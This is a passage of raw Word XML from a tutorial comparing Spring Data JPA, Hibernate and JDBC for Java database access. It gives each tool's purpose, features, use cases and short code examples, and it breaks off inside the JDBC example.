      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyBatis</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help understand their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9EB277" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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1. Spring Data JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C317C23" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1923"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Data JPA is a part of the larger Spring Data project and simplifies working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making it easier to interact with relational databases using </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-relational mapping (ORM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21741CC3" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1923"/>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Main Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E803AB4" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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Provides an abstraction layer over JPA, reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185911BD" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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Automatically generates queries based on method names (e.g., findByName(), findByAgeGreaterThan()) using the JpaRepository interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A4D5D" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA providers</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EclipseLink</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenJPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246AA20" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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Allows the creation of custom queries with JPQL (Java Persistence Query Language) or native SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF95017" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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orks seamlessly with Spring and Spring Boot for easy integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76823A40" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1923"/>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When to Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01966B" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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hen you want to leverage the power of JPA (ORM) and Spring together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F479BD" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1923"/>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hen you want to reduce boilerplate code for CRUD operations, queries, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF0CAA" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1923"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C5E120"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Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A5CC6"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public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5CABC"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List&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F479E"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B5EE7" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="00000000" w:rsidP="00452C1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60D4A9">
          <v:rect id="_x0000_i2125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="048489FB" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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2. Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE0F4A" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hibernate is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides ORM capabilities to map Java objects to database tables. It is one of the most popular JPA providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D7110" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192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Main Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40372AEF" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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Provides a full-fledged ORM framework with advanced features such as lazy loading, caching, and session management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76EE8A" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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orks directly with JPA annotations for object-to-database mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9E433" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL (Hibernate Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is similar to SQL but works with objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4379F" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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Integrates easily with Spring Data JPA for a higher-level abstraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F67FFE" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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Handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and manages </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entity states</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998F3B7" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192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lastRenderedPageBreak/>
        <w:t>When to Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA7A83" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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hen you need full ORM capabilities with fine control over the mapping between Java objects and database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAD4EC" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192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hen you need caching, lazy loading, and other advanced ORM features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5739C6" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1924"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46504B2E"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160ED12"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Table(name = "employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E737858"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public class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCB9A3"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA6ABF"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DF4A2"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private Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EBD20"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private String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA3908"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2AE1E5" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="00000000" w:rsidP="00452C1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CAFB70">
          <v:rect id="_x0000_i2126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28B693" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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3. JDBC (Java Database Connectivity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F121EE" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1925"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JDBC is a low-level API in Java that provides a standard interface for connecting to databases and executing SQL queries. It requires manual handling of database connections, statements, and result sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFA378" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1925"/>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Main Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EFDAC" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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Works directly with </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ResultSets</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PreparedStatements</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6897A" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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No abstraction layer, meaning the developer must handle connections, error handling, and result mapping manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904C692" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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Offers complete control over SQL queries, but can lead to a lot of boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174279D3" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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orks without needing any ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4862A0" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1925"/>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When to Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC7F33" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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hen you need full control over your SQL queries and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A890BC" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1925"/>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hen you prefer not to use ORM or need to interact with databases in a non-ORM way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C54188" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1925"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FD1F4"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public void getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6456C"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String sql = "SELECT * FROM employees WHERE id = ?";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32321A86"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try (Connection conn = DriverManager.getConnection(DB_URL, USER, PASS);</w:t>
      </w:r>
    </w:p>
